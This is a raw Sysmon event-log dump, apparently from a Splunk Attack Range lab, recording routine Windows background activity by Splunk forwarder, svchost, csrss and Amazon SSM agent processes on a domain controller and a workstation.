10:54:20.854{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.854{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-125C-6216-3705-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.854{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-125C-6216-3705-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.856{C8EA50B7-125C-6216-3705-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.691{C8EA50B7-125C-6216-3605-000000003802}68166820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000289381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:18.579{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53529-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.437{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D57224C2652618819558CD3DAE6986,SHA256=A529E97509A79B3738FF2237B1FA92410C956F673D08D66ECB5CEFFCF9BF8C7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.422{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B4D8E758F4350693E0BC1686660342,SHA256=59B89AF7AF6B6E8E76B5FD14DA3944BA52C7492C91CFECEF8833B4E10034E866,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-125C-6216-3605-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-125C-6216-3605-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.253{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-125C-6216-3605-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:20.254{C8EA50B7-125C-6216-3605-000000003802}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:21.952{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92B1CEDCE9AC54F3847AA78C2D053C5,SHA256=708C528E87ACBDD7BD1DCC876FBC7CCDCEEB43337452236523F82E337BA28D91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.552{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-137MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0296FFEF864F6C2D5F8BE336071D608,SHA256=A26C0B6363A55E196657FD105DD6E1BA1BA733EE35AAE624A3CB422C8AB8B5DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.371{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-125D-6216-3805-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.355{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.355{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.355{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.355{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.355{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-125D-6216-3805-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.355{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-125D-6216-3805-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.357{C8EA50B7-125D-6216-3805-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:21.255{C8EA50B7-125C-6216-3705-000000003802}68562080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:22.967{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77AD7D84D04FE78EEBBA16083D9D3F0C,SHA256=DA230279E45944456BCD2FFE7E090AA812E9D16153AB5E5FA7AE2E4CB1B4CF73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:22.543{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-138MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:22.472{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29DA4F4FA01099AEBEA12EFE9D5410AF,SHA256=595C83B5A2E3FE71E6FD7BC316EE044AEBF3D47E355340D95E4A2C05721E9A81,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:18.572{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51382-false10.0.1.12-8000- 23542300x8000000000000000289404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:23.491{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E59D3FAAC2C0B5FDC1BD57F51C2C68D,SHA256=4F35A1352D45BBD10D97D5A018A36F62EA2B2707DE6C3BDF984DB6AEC5DE8CB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 